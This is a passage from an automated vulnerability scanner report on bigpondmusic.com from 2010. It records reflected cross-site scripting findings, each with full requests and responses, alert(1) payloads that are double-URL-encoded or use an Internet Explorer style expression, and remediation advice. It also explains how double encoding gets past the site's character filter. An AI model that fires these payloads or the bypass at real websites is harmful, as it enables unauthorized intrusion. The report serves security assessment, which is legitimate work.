GET /bargainse1081'%3b46a0f08e718/dalbums HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87802
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a was submitted in the REST URL parameter 1. This input was echoed as 1e05b"><script>alert(1)</script>6a53617805a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains1e05b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a53617805a/dalbums HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87866
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc was submitted in the REST URL parameter 2. This input was echoed as eadd3"><script>alert(1)</script>9f418beffdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains/dalbumseadd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f418beffdc HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907ce'%3beb1515a2326 was submitted in the REST URL parameter 2. This input was echoed as 907ce';eb1515a2326 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains/dalbums907ce'%3beb1515a2326 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87793
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.166. http://bigpondmusic.com/bargains/dalbums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bargains/dalbums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643e0"style%3d"x%3aexpression(alert(1))"352441b3890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643e0"style="x:expression(alert(1))"352441b3890 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bargains/dalbums?643e0"style%3d"x%3aexpression(alert(1))"352441b3890=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 349065
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Double Albums - BigPond Musi ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbums?643e0"style="x:expression(alert(1))"352441b3890=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553f9'%3b12846113a16 was submitted in the REST URL parameter 1. This input was echoed as 553f9';12846113a16 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains553f9'%3b12846113a16/under11 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87871
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8 was submitted in the REST URL parameter 1. This input was echoed as be40b"><script>alert(1)</script>a55f571f2e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargainsbe40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8/under11 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87904
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 was submitted in the REST URL parameter 2. This input was echoed as 2a0f0"><script>alert(1)</script>6d2018e8d34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains/under112a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87866
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4a97'%3b192cd7debc4 was submitted in the REST URL parameter 2. This input was echoed as f4a97';192cd7debc4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains/under11f4a97'%3b192cd7debc4 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:16:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87733
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.171. http://bigpondmusic.com/bargains/under11 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bargains/under11
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85cfd"style="x:expression(alert(1))"bf04d3f3adc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bargains/under11?85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 231489
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Albums $11 and under - BigPo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under11?85cfd"style="x:expression(alert(1))"bf04d3f3adc=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e was submitted in the REST URL parameter 1. This input was echoed as 885a4"><script>alert(1)</script>316cb794c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e/under13 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87834
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32294'%3bec059bf4529 was submitted in the REST URL parameter 1. This input was echoed as 32294';ec059bf4529 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains32294'%3bec059bf4529/under13 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87733
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 was submitted in the REST URL parameter 2. This input was echoed as c2220"><script>alert(1)</script>5e45c0b35f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bargains/under13c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88112
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51d00'%3b5edcbbcdac6 was submitted in the REST URL parameter 2. This input was echoed as 51d00';5edcbbcdac6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bargains/under1351d00'%3b5edcbbcdac6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87802
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.176. http://bigpondmusic.com/bargains/under13 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bargains/under13
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 874f6"style="x:expression(alert(1))"4e4f0e24928 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bargains/under13?874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
